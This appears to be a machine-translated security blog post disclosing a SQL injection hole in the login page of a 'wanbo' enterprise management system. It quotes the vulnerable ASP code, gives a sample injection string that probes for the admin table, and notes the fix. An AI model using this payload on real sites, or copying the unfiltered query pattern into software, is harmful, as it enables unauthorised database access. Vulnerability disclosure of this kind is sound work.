FROM http://www.st999.cn/blog
In the past two days, I met an enterprise management system named wanbo several times. Today I downloaded it and looked at it. I found an injection vulnerability. What I was depressed about was that I had to do it manually, there is no way to use tools. Because I have found one, so I am not interested in it.
This injection vulnerability occurs in the html/MemberLogin. asp file. The NoSqlHack. Asp file in the Include file is not called either. Haha, we can use it.
MemberLogin. asp source code is as follows:
<% @ LANGUAGE = "VBSCRIPT" CODEPAGE = "65001" %>
<% Option Explicit %>
<% Response. Charset = "UTF-8" %>
<! -- # Include file = "../Include/Const. asp" -->
<! -- # Include file = "../Include/ConnSiteData. asp" -->
<! -- # Include file = "../Include/Md5.asp" -->
<%
If request. QueryString ("Action") = "Out" then
Session. contents. remove "MemName"
Session. contents. remove "GroupID"
Session. contents. remove "GroupLevel"
Session. contents. remove "MemLogin"
Response. redirect Cstr (request. ServerVariables ("HTTP_REFERER "))
Response. end
End if
Public ErrMsg (3)
ErrMsg (0) = "· incorrect login name. Please return. "
ErrMsg (1) = "· incorrect logon password. Please return. "
ErrMsg (2) = "· the account is not in use. Please return. "
Www.2cto.com
Dim LoginName, LoginPassword, VerifyCode, MemName, Password, GroupID, GroupName, Working, rs, SQL
LoginName = trim (request. form ("LoginName "))
LoginPassword = Md5 (request. form ("LoginPassword "))
Set rs = server. createobject ("adodb. recordset ")
SQL = "select * from NwebCn_Members where MemName = '" & LoginName &"'"
Rs. open SQL, conn, 1, 3
If rs. bof and rs. eof then
WriteMsg (ErrMsg (0 ))
Response. end
Else
MemName = rs ("MemName ")
Password = rs ("Password ")
GroupID = rs ("GroupID ")
GroupName = rs ("GroupName ")
Working = rs ("Working ")
End if
If LoginPassword <> Password then
WriteMsg (ErrMsg (1 ))
Response. end
End if
If not Working then
WriteMsg (ErrMsg (2 ))
Response. end
End if
If UCase (LoginName) = UCase (MemName) and LoginPassword = Password then
Rs ("LastLoginTime") = now ()
Rs ("LastLoginIP") = Request. ServerVariables ("Remote_Addr ")
Rs ("LoginTimes") = rs ("LoginTimes") + 1
Rs. update
Rs. close
Set rs = nothing
Session ("MemName") = MemName
Session ("GroupID") = GroupID
'============
Set rs = server. createobject ("adodb. recordset ")
SQL = "select * from NwebCn_MemGroup where GroupID = '" & GroupID &"'"
Rs. open SQL, conn, 1, 1
Session ("GroupLevel") = rs ("GroupLevel ")
Rs. close
Set rs = nothing
'============
Session ("MemLogin") = "Succeed"
Session. timeout = 60
Response. redirect Cstr (request. ServerVariables ("HTTP_REFERER "))
Response. end
End if
%>
As you can see, LoginName is not filtered and directly substituted into the query. Therefore, this injection is generated, which means the method is a little troublesome. I tried it and I couldn't use the tool, so I was depressed.
For example, wzasdf 'and exists (select * from [nwebcn_admin]) and '1' = '1
Really depressing manual, this JB rotten hole...
Www.2cto.com fixed: LoginName Filtering